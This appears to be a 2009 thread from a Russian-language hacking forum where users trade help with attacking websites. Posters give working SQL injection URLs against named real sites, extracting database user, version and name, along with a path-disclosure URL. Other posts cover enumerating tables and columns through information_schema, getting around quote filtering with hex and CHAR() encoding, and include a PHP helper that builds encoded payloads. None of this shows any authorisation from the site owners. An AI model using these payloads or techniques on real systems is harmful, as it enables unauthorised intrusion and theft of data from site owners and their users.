Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    как бы там только раскрытие путей.
    http://www.aghamyan.am/biography.php?form_id[]=6
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    может кто поможет никак не могу обходит филтрацию редирект идет ((

     
  3. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    http://www.worstpreviews.com/headline2.php?id=16149'
    Подскажите, как раскрутить.
     
  4. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8
     
  5. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,unhex(hex(user())),3,4,5,6,7,8
     
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ну спс за ответы ((
     
  7. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Может не туда конечно пишу. Скажите почему не пингуется главная машина в сети (192.168.0.1). Все 40 компьютеров в сети пингуются, а сервак ни в какую. Что он сделал чтобы не пинговалось? И можно ли как нибудь это одолеть?
     
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ИМХО
    если сеть работает, то это гон, что сервер не пингуеться
    В любом случаи сервер должен пинговаться
     
  9. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    а в чем проблема зарезать ICMP трафик файрволом?
     
    1 person likes this.
  10. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    А смысл?
    Я так понимаю, ICMP используется для передачи сообщений об ошибках, возникших при передаче данных.
     
    #10830 SeNaP, 27 Dec 2009
    Last edited: 27 Dec 2009
  11. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    а пинги по твоему это не трафик? "пинги" это и есть icmp пакеты, и отрубается это легко как и сказал oRb
     
  12. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Ну если нет пинга -> трафика -> ICMP пакетов, значит нет ответа от сервера?
    Или я не так понял...?
     
  13. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    как узнать какие столбцы в таблице?
    http://site.com/uid=1+union+select+1,2,3,table_name+from+information_schema.tables-- Узнаем таблицы.

    http://site/uid=-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS-- А так по идее название столбцов?
     
  14. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Union+select+column_name+from+information_schema.columns+where+table_name='table'
     
  15. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Пробовал, тоже не получается, просто ошибка: You have an error in your SQL synta......
     
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    на ковычки ругаеться скорей всего (в тексте ошибки точней сказано), пробуй talbe перевести в char
     
  17. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    вообще твои запросы покатит не везде
    Code:
    +where+table_name='table'
    реал покатит перевести в Hex - кодировку
    Code:
    +where+table_name=0x7461626c65
    где 0x7461626c65 = table

    З.Ы. а еще можно попытать счастье угадывая поля :(
     
    2 people like this.
  18. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    скорее всего фильтруются кавычки, и на этот случай, специально для нас :) разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.

    Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.

    PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.

    PHP:
    <form action='' method='POST'>
         <input type='text' name='ascii' />
         <input type='submit' name='gogo' />
    </form>
    <hr/>
    <?php
         
    if($_POST['gogo'] && $_POST['ascii'] != ''){
             for(
    $i 0$i strlen($_POST['ascii']); $i++){
                 
    $arr[] = substr($_POST['ascii'], $i1);
             }
             
    $str 'char(';
             foreach(
    $arr as $k=>$v) { 
                if(
    $k == count($arr) - 1){ $str .= ord($v).')'; break; }
                  
    $str .= ord($v).',';
             } 
            echo 
    $str;
         }
    ?>
     
  19. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    И вместо всего этого понта-поста достаточно было написать
    PHP:
    <?php echo '0x'.bin2hex($_GET['c']);?>
     
    2 people like this.
  20. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Все. разобрался, всем большое спасибо!
     
Thread Status:
Not open for further replies.